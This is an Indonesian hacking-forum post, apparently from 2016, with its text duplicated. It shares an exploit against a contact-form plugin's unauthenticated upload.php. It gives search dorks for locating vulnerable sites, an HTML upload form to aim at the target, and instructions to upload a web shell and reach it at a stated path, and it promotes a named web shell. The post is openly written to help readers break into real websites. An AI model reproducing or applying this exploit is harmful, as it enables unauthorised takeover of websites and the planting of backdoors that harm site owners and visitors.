05-27-2016, 12:02 PM
iseng2 share exploit lawas, kali aja masih crootz.
btw sekalian nyicip Shell BACKBOX INDONESIA WEB SHELL V1.0 (BASED ON INDOXPLOIT SHELL) dari Kang hightech.
langsung ja, Play with me Baby :heart:
Dork:
"/cfg-contactform-1/"
"/cfg-contactform-2/"
# Disini exploitnya tergantung contact form yg keberapa mas bro,
/[path]/cfg-contactform-1/inc/upload.php
Vuln? {"filename":" -001."} *trgantung dork sih
![[Image: 7b43e7787e784a25a581c140acc7a1dd.png]](http://image.prntscr.com/image/7b43e7787e784a25a581c140acc7a1dd.png)
CSRF Upload:
<form enctype="multipart/form-data"
action="target" method="post">
<input type="text" name="folder" value="./" /><br />
Please choose a file: <input name="Filedata" type="file" /><br />
<input type="submit" value="upload" />
</form>
lalu tinggal upload file/shell ente.
kalo berhasil muncul nama shell ente
![[Image: 8f90e2f76d0b402fa904af6623ff68fa.png]](http://image.prntscr.com/image/8f90e2f76d0b402fa904af6623ff68fa.png)
Shell Akses:/[path]/cfg-contactform-1/upload/namashell.php
![[Image: 50ec314b0dc94aef8937f16135eca205.png]](http://image.prntscr.com/image/50ec314b0dc94aef8937f16135eca205.png)
untuk code PHP disini
Semoga bermanfaat gengs, maap kalo tutor cupu :D
jgn lupa kunjungin Blog ane juga yak wkkww : TKJ Cyber Art
~ Bye
SUMUR
btw sekalian nyicip Shell BACKBOX INDONESIA WEB SHELL V1.0 (BASED ON INDOXPLOIT SHELL) dari Kang hightech.
langsung ja, Play with me Baby :heart:
Dork:
"/cfg-contactform-1/"
"/cfg-contactform-2/"
# Disini exploitnya tergantung contact form yg keberapa mas bro,
/[path]/cfg-contactform-1/inc/upload.php
Vuln? {"filename":" -001."} *trgantung dork sih
CSRF Upload:
<form enctype="multipart/form-data"
action="target" method="post">
<input type="text" name="folder" value="./" /><br />
Please choose a file: <input name="Filedata" type="file" /><br />
<input type="submit" value="upload" />
</form>
lalu tinggal upload file/shell ente.
kalo berhasil muncul nama shell ente
Shell Akses:/[path]/cfg-contactform-1/upload/namashell.php
untuk code PHP disini
Semoga bermanfaat gengs, maap kalo tutor cupu :D
jgn lupa kunjungin Blog ane juga yak wkkww : TKJ Cyber Art
~ Bye
SUMUR